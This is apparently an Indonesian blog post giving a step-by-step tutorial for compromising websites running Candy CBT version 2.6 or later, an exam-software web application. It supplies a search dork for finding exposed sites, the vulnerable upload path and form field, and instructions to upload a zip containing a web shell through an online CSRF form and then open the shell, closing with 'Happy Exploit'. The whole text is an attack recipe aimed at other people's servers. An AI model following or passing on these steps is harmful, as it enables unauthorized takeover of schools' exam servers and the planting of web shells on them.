Kali Ini Saya Nemu Bug Di Candy Cbt Lo Tapi Bug Ini Hanya Bisa Di Gunakan Di Candy Cbt Versi 2.6 Ke Atas...
Langsung Saja Saya Buat Tutornya..
- Dork
intext:Candy CBT v2.6
- Exploit
/admin/soal/import_file.php
Or
/[patch]/admin/soal/import_file.php
- Postfile
zip_file
- Nah Kalian Dorking Dulu Gan Gunakan Dork Yang Saya Bagi Di Atas (Dork Nya Kembangin Gan)
- Jika Sudah Dorking Masukan Exploitnya
- Nah Jika Sudah Di Masukan Exploitnya Dan Blank Artinya Web Tersebut Vuln
 |
| Blank Vuln Jika Tidak Blank Artinya Tidak Vuln Gan |
- Nah Tinggal Ke Csrf Online Gan Banyak Di Google
- Nah Jika Sudah Kita Upload Filenya Gan
- Note : Harus Berbentuk Zip Yah Gan Karna Jika Upload Ext Selain Zip Gagal Gan
- Contoh Seperti Gambar Saya Berikut Ini
- Di Gambar Tersebut Saya Sisipkan Beberapa Shell Dan Uploader Jadi Intinya Kalian Buat File ext zip dan di dalamnya Ada Shell Kalian
- Nah Jika Sudah Kalian Upload
- Jika Success Akan Seperti Ini
- Akses Shell Kalian
http://site.com/files/shell kalian.php
Or
http://site.com/[patch]/files/shell Kalian.php
- Selesai
Sekian Dan Happy Exploit
Semoga Kalian Bisa Mengexploitasi Dan Mengembangkannya Terima Kasih
0 Komentar